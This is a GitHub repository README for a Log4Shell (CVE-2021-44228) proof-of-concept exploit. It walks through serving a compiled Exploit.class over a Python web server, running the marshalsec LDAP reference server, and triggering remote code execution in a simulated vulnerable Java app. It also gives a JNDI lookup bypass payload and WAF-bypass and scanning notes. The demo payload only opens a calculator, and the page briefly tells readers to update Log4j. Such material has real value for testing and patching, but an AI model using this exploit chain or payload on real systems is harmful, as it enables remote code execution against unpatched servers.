Skip to content


Folders and files

Last commit message
Last commit date

Latest commit



23 Commits

Repository files navigation

CVE-2021-44228(Apache Log4j Remote Code Execution)

all log4j-core versions >=2.0-beta9 and <=2.14.1

The version of 1.x have other vulnerabilities, we recommend that you update the latest version.

Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)


download this project, compile the exploit code blob/master/src/main/java/, and start a webserver allowing downloading the compiled binary.

git clone
cd CVE-2021-44228-Apache-Log4j-Rce


# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888

# make sure python webserver is running the same directory as Exploit.class, to test
  curl -I

download another project and run LDAP server implementation returning JNDI references

git clone
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer ""

build and run the activation code (simulate an log4j attack on a vulnerable java web server) blob/master/src/main/java/, and your calculator app will appear.

cd CVE-2021-44228-Apache-Log4j-Rce
mvn clean package
java -cp target/log4j-rce-1.0-SNAPSHOT-all.jar log4j

# expect the following
# 1. calculator app appear
# 2. in ldapserver console,
#  Send LDAP reference result for Exploit redirecting to
# 3. in webserver console,
# - - [....] "GET /Exploit.class HTTP/1.1" 200 -


Do not rely on a current Java version to save you. Update Log4 (or remove the JNDI lookup). Disable the expansion (seems a pretty bad idea anyways).

Bypass rc1

For example:

${jndi:ldap:// badClassName}

Bypass WAF


Don't trust the web application firewall.

Details Of Vuln

Lookups provide a way to add values to the Log4j configuration at arbitrary places.


The methods to cause leak in finally


Simple Check Method

If you want to do black-box testing, I suggest you do passive scanning.


Have Fun!!! BurpLog4jScan.png

Stargazers over time

Stargazers over time